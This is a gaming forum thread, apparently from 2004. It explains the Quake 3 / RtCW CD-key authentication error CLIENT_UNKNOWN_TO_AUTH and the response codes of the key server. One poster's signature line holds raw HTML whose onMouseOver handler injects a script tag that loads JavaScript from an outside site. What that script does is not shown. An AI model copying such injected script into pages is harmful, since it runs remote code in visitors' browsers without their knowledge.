[MoB]CIRCA

i need some help!!!

Post by [MoB]CIRCA »

whenever i try to connect to a server, it says

CLIENT_UNKNOWN_TO_AUTH

what does this mean?? and how can i fix it?? :devil:
Rain

Post by Rain »

CLIENT_UNKNOWN_TO_AUTH means that the CD key server didn't recieve your CD key, or it received it from a different IP than the one you're presenting to the server.

Here's a brief lesson on how Q3/RtCW check CD keys:
  • Client sends CD key to CD key server
  • Client sends connection request to game server
  • Game server sends the client's IP to the CD key server
  • CD key server replies:
    • CLIENT_UNKNOWN_TO_AUTH: "I don't know anything about the player from the IP address you gave me. Either they never sent me a CD key (sometimes this happens normally due to packet loss, but if it's consistent it's probably a network configuration problem), or they sent it from a different address (not a likely scenario for any home user--the server doesn't check keys for IP addresses it believes to be on the local network.)"
    • BANNED_CDKEY: "You really should buy the game."
    • INVALID_CDKEY: "This is not a valid CD key. You probably mistyped it, or it's blank. Double-check it."
      This *might* happen for valid keys that really don't exist, I'm not 100% sure.
    • KEY_IS_GOOD: "Let 'em in."
  • Game server either accepts or rejects the connection, based on what the CD key server says.
Last edited by Rain on Thu Aug 12, 2004 9:45 am, edited 1 time in total.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
alex247

Post by alex247 »

Thanks rain for the lesson.

That has happened to me a few times but I tried agian and got right into the server.

Or if that "CLIENT_UNKNOWN_TO_AUTH" comes up...I wait a minute and it will go away. Then it will connect with the server.

8)